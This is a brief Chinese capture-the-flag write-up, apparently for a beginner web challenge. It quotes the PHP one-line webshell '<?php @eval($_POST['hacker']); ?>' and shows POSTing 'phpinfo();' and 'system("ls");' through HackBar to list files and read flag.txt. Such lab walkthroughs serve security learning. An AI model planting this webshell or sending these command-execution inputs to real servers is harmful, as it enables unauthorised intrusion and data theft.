进入场景如下图
据题目描述,百度一下php一句话,PHP一句话木马 - 随风而逝的白色相簿 - 博客园
查到PHP一句话木马:
1. eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行
看到<....>里提示post使用HackBar
点击F12,Load URL勾选post data再出现的文本框中输入shell=phpinfo();
出现如下图
没找到flag换查一下目录shell=system("ls");
说明了当前目录中确实有flag.txt
就直接抓取flag.txt
得到flag